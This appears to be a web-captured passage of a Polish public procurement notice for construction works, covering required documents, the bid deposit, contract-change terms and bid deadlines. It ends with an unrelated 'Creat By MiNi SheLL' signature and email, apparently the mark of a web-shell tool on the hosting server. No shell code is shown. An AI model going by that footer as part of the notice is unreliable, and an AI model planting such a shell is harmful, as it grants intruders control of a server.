podmiotowe środki dowodowe w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu oraz potwierdzenia braku podstaw wykluczenia:<br/>a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 10 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, na lub wg załącznika nr 6 do SWZ.<br/>b)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, na lub wg załącznika nr 7 do SWZ.<br/>c)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Zgodnie z § 8.2 Rozporządzenia Ministra Rozwoju, Pracy i Technologii w sprawie podmiotowych środków dowodowych oraz innych dokumentów i oświadczeń, jakich może żądać zamawiający od wykonawcy. W przypadku gdy z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o których mowa w 22.1.c) SWZ, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ZGODNIE Z PKT. 12.17 SWZ 12.17.	Ofertę stanowi:<br/>a)	Formularz Ofertowy – załącznik nr 2<br/>b)	Dokument potwierdzający umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby musi być zgodny z wymaganiami określonymi w § 6 ust. 1 lub 2 lub 3 Rozporządzenia rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>Z dokumentu potwierdzającego umocowanie do reprezentowania lub pełnomocnictwa musi bezpośrednio wynikać jego zakres tj., do jakich czynności jest uprawniona umocowana osoba /pełnomocnik. <br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w Formularzu Ofertowym w pkt. II.12 dane umożliwiające dostęp do tych dokumentów. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej, zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. Powyższe wymagania stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>c)	Zbiorcze Zestawienia Wartości Elementów Rozliczeniowych na lub wg Załącznika nr 2A do SWZ obejmujące wszystkie roboty niezbędne do realizacji niniejszego przedmiotu zamówienia zawarte w Przedmiarze Robót - Załącznik nr 1A do SWZ, Opisie Przedmiotu Zamówienia i dokumentach zamówienia.<br/>d)	Oświadczenia o niepodleganiu wykluczeniu – załącznik nr 3 do SWZ.<br/>e)	Oświadczenie o spełnianiu warunku udziału w postępowaniu – załącznik nr 4 do SWZ.<br/>f)	Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów – jeżeli dotyczy – załącznik nr 5 do SWZ.<br/>g)	OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O ZAMÓWIENIE (ART. 117 UST. 4 USTAWY PZP) na lub wg druku załącznika 4a – jeżeli Wykonawca składa ofertę jako Konsorcjum.<br/>h)	Wadium złożone zgodnie z pkt. 29 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od wykonawców wniesienia wadium. Kwota wymagana do wzięcia udziału w postępowaniu to: 75 000,00 zł <br/>29.2.	Formy wniesienia wadium:<br/>a)	pieniądz;<br/>b)	gwarancje bankowe;<br/>c)	gwarancje ubezpieczeniowe;<br/>d)	poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r., poz. 310, 836 i 1572).<br/>29.3.	Wadium wnoszone w formie gwarancji lub poręczenia, o którym mowa wyżej wykonawca przekazuje zamawiającemu w oryginale gwarancji lub poręczenia, w postaci elektronicznej. <br/>29.4.Informacje dodatkowe o wadium:<br/>a)	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. <br/>b)	Wadium wnoszone w formie pieniężnej należy wnieść w terminie wcześniejszym, tak by przed godz. 08:00 dnia 06.06.2024 r. oferta była zabezpieczona wadium, za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego.<br/>c)	W przypadku wnoszenia wadium w formie pieniężnej wpłaca się przelew na rachunek bankowy Zamawiającego tj.: BANK POLSKA KASA OPIEKI S.A. GRUPA PEKAO S.A. I O/ KATOWICE NR 85 1240 1330 1111 0000 2304 0700.<br/>d)	Zamawiający informuje, że wadium należy dołączyć do oferty. <br/>e)	Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 98 ustawy PZP.<br/>f)	W przypadku wadium wniesionego w pieniądzu Zamawiający zgodnie z art. 98 ust. 4 ustawy PZP zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>g)	Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 98 ust. 6 ustawy PZP. <br/>h)	Wadium wnoszone w gwarancji bankowej lub gwarancji ubezpieczeniowej, winno być wystawione na druku wystawcy. Wyżej wymienione gwarancje powinny być sporządzone zgodnie z obowiązującym prawem i winny zawierać niżej wymienione elementy:<br/>-	nazwę dającego zlecenie i adres jego siedziby,<br/>-	nazwę postępowania na które zostaje złożone wadium,<br/>-	nazwę Beneficjenta,<br/>-	kwota wadium, która ma być zabezpieczona gwarancją,<br/>-	zobowiązanie gwaranta do nieodwołalnego i bezwarunkowego zapłacenia kwoty wadium na pierwsze pisemne, doręczone przez zamawiającego żądanie zapłaty,<br/>-	okres obowiązywania,<br/>-	warunki wygaśnięcia,<br/>-	okres gwarancji musi obejmować cały okres związania ofertą,<br/>-	gwarancja musi być podpisana przez osoby/ę uprawnioną zgodnie z zasadami reprezentacji Gwaranta. <br/>29.5.	Zgodnie z art. 98 ust. 5 ustawy PZP, Zamawiający zwraca wadium wniesione w innej formie niż pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ZGODNIE Z PKT. 41 SWZ 41.1.	W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 58 ustawy PZP.<br/>41.2.	Z dokumentu potwierdzającego umocowanie do reprezentowania lub pełnomocnictwa musi bezpośrednio wynikać jego zakres tj., do jakich czynności jest uprawniona umocowana osoba /pełnomocnik. Dokument ten musi być zgodny z wymaganiami określonymi w § 6 ust. 1 lub 2 lub 3 Rozporządzenia rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). <br/>41.3.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie każdy z nich składa oświadczenie (załącznik nr 3 do SWZ) potwierdzające brak podstaw wykluczenia oraz potwierdzające spełniane warunków udziału w postępowaniu (załącznik nr 4 do SWZ), w zakresie w jakim każdy z tych wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>41.4.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie należy złożyć oświadczenie (załącznik nr 4a do SWZ), z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy – zgodnie z art. 117 ust. 4 ustawy PZP. Oświadczenie jest składane wraz z ofertą.<br/>41.5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt. 22.1. SWZ.<br/>41.6.	W odniesieniu do wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych wykonawców, gdyż nie jest to uzasadnione charakterem zamówienia i proporcjonalne do jego przedmiotu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki wprowadzenia zmian postanowień zawartej umowy<br/>I.	Zamawiający przewiduje rodzaj i zakres zmian postanowień zawartej umowy:<br/>1.	ZMIANY OGÓLNE<br/>A.	Możliwa jest:<br/>a)	zmiana adresu/nazwy firmy/siedziby Zamawiającego/Wykonawcy/Podwykonawcy,<br/>b)	zmiana osób występujących po stronie Zamawiającego/Wykonawcy/Podwykonawcy,<br/>c)	zmiana w kolejności i terminach wykonywania robót, <br/>d)	zmiana numeru rachunku Wykonawcy,<br/>e)	zmiana będąca skutkiem poprawy oczywistej omyłki,<br/>f)	zmiana zakresu podwykonawstwa,<br/>g)	zaakceptowana zmiana podwykonawcy,<br/>h)	zmiana Umowy wynikająca ze zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy,<br/>i)	zmiana w zakresie postanowień dotyczących powierzenia przetwarzania danych osobowych,<br/>j)	możliwa jest zmiana postanowień Umowy w zakresie stosowania mechanizmu podzielonej płatności (split payment), o którym mowa w ustawie o podatku od towarów i usług.<br/>B.	Wykonawcę może zastąpić nowy wykonawca – w przypadku zaistnienia okoliczności opisanych w art. 455 ust. 1 pkt. 2 lit. b) i c) ustawy PZP.<br/>C.	Możliwa jest zmiana zakresu robót, z zastrzeżeniem minimalnej wartości lub wielkości świadczenia stron, wskazanego w Opisie Przedmiotu Zamówienia.<br/>2.	ZMIANY RZUTUJĄCE NA TERMIN WYKONANIA UMOWY <br/>A.	Możliwe jest przedłużenie terminu zakończenia Umowy o czas opóźnienia, jeśli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu Umowy, w zakresie następujących obowiązków Zamawiającego:<br/>a)	przekazanie terenu budowy,<br/>b)	przekazanie dokumentów związanych z prowadzeniem budowy.<br/>B.	Możliwa jest zmiana terminu wykonania Umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:<br/>a)	oczekiwanie Wykonawcy na niezbędne opinie, decyzje administracyjne (opóźnienie spowodowane przez władze),<br/>b)	przedłużenie procedury udzielenia zamówienia, poza pierwotny termin związania ofertą,<br/>c)	uwarunkowania społeczne (protesty, listy, petycje, itp.),<br/>d)	konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami nieruchomości,<br/>e)	z realizacją dodatkowych robót, o których mowa w art. 455 ust. 1 pkt. 3 ustawy PZP,<br/>f)	technologię wykonywania robót,<br/>g)	zmiany stanu prawnego,<br/>h)	warunki geotechniczne, których nie można było przewidzieć,<br/>i)	niesprzyjające warunki atmosferyczne, odbiegające od średniej 5-cio letniej w miejscu prowadzenia robót, <br/>j)	wykopaliska mogące mieć znaczenie archeologiczne lub historyczne uniemożliwiające wykonywanie robót,<br/>k)	działania sił natury, uznanych za stan klęski żywiołowej,<br/>l)	rezygnację z części robót, w przypadku braku potrzeby ich wykonania, z zastrzeżeniem minimalnej wartości lub wielkości świadczenia stron, wskazanego w Opisie Przedmiotu Zamówienia,<br/>m)	zmianę powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy <br/>n)	siłę wyższą (§ 13).<br/>C.	Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia Umowy jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.<br/>3.	ZMIANY RZUTUJĄCE NA WYNAGRODZENIE WYKONAWCY<br/>Możliwa jest zmiana postanowień Umowy w związku:<br/>a)	ze zmianą stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	z rezygnacją z części robót budowlanych, w przypadku braku potrzeby ich wykonania, z zastrzeżeniem minimalnej wartości lub wielkości świadczenia stron, wskazanego w Opisie Przedmiotu Zamówienia.<br/>c)	ze zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację Umowy,<br/>d)	okolicznościami opisanymi w Opisie Przedmiotu Zamówienia,<br/>e)	z realizacją dodatkowych robót, o których mowa w art. 455 ust. 1 pkt. 3 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-06 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zdw.katowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-06 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> CIĄG DALSZY: 8.8. Oferta, oświadczenia i dokumenty powinny być sporządzane w jednym z formatów danych określonych<br/>w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, tj. określonych w załączniku nr 2 do rozporządzenia Rady Ministrów z dnia 12 kwietnia<br/>2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj. Dz. U. z 2017 r., poz. 2247).<br/>Zalecane formaty sporządzania oświadczeń i dokumentów to: .pdf, .doc, .docx, .xls, .docx, .xlsx, .txt, .xlsx, .jpg ze<br/>szczególnym wskazaniem na .pdf. Natomiast zalecane formaty poddające dane kompresji to: zip., 7Z. W przypadku<br/>przekazywania dokumentu elektronicznego w formacie zip., 7Z opatrzenie pliku zawierającego skompresowane dokumenty<br/>kwalifikowanym podpisem elektronicznym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym.<br/>8.9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez<br/>Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został<br/>spełniony obowiązek narzucony w art. 221 Ustawy PZP.<br/>8.10. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>8.11. Wykonawca w całym postępowaniu odwołuje się do nr postępowania wskazanego przez Zamawiającego<br/>WM/TP/240422/1.<br/>8.12. Wykonawca nie może składać dokumentów w innej formie niż wskazana wyżej w niniejszym postępowaniu.<br/>Zgodnie z zapisami pkt. 15 SWZ Zamawiający określił podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy PZP.<br/>W pkt. 20 SWZ Zamawiający wskazał: PODSTAWY WYKLUCZENIA, O KTÓRYCH MOWA W ART. 7 UST. 1 USTAWY Z<br/>DNIA 13 KWIETNIA 2022 R. O SZCZEGÓLNYCH ROZWIĄZANIACH W ZAKRESIE PRZECIWDZIAŁANIA WSPIERANIU<br/>AGRESJI NA UKRAINĘ ORAZ SŁUŻĄCYCH OCHRONIE BEZPIECZEŃSTWA NARODOWEGO.<br/>Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy stanowi pkt. 19 SWZ<br/>CIĄG DLASZY DOTYCZĄCY ZMIAN UMOWY PRZEWIDZIANYCH Określa się następujące warunki wprowadzenia zmian postanowień Umowy:<br/>1.	Sposób inicjowania zmian:<br/>A.	Zamawiający:<br/>a)	wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,<br/>b)	wnioskuje, aby Wykonawca przedłożył propozycję zmiany.<br/>B.	Osoby występujące po stronie Zamawiającego:<br/>a)	wnioskują do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany.<br/>C.	Wykonawca:<br/>a)	wnioskuje do Zamawiającego o dokonanie wskazanej zmiany.<br/>2.	Przyczyny dokonania zmian postanowień Umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności, itp.). Protokół konieczności wymaga zatwierdzenia Kierownika Zamawiającego.<br/>3.	W rezultacie dokonania czynności opisanych w ust. 1 i ust. 2 może dojść do podpisania przez strony aneksu do Umowy. Projekt aneksu przygotuje Zamawiający

Creat By MiNi SheLL
Email: jattceo@gmail.com